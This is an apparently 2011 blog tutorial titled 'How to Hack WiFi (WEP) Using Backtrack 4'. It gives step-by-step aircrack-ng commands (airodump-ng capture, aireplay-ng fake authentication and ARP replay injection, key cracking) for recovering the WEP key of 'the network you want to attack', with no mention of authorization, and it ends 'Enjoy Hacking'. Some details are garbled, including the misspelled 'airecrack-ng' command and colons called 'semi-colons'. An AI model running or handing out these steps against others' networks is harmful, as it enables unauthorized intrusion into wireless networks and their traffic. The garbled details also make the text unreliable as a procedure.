Saturday 30 April 2011

How to Hack WiFi (WEP) Using Backtrack 4

1. Boot Live CD/DVD of BackTrack 4. After it boots, type in "startx" to start GUI

2. Open new Konsole (backtrack's terminal).

3. Type, not using qoutes, "airodump-ng wlan0". Now find the network you want to attack. Copy the BSSID and the channel (write down on piece of paper and keep handy)

4. Open new Konsole, type "airodump-ng -w wep -c 11 --bssid 00:24:b2:80:d7:3c wlan0"   **X & 00:24:b2:80:d7:3c are examples of the channel and bssid you should have copied**

5. You are now fixed on to the network you want to attack.

6. Close the first Konsole, open a new Konsole and type "aireplay-ng -1 0 -a 00:24:b2:80:d7:3c wlan0"  **00:24:b2:80:d7:3c is an example as well**

7. Open another new Konsole, type "aireplay-ng -3 -b 00:24:b2:80:d7:3c wlan0"  **00:24:b2:80:d7:3c example"

8. Go to first Konsole, wait for the Data to reach to 30,000; go to 3rd Konsole, hit CNTL + C, then type in "dir", hit enter

9. Type "airecrack-ng wep.01.cap", hit enter.

10. Let it run its course, should only take a few moments. Once key is found, it will show up with semi-colons in it. Take out the semi-colons, and this will be the key. (Example of key; 53:06:66:51:50, so it will be 5306665150)

11. Enjoy Hacking, Enjoy Hackton.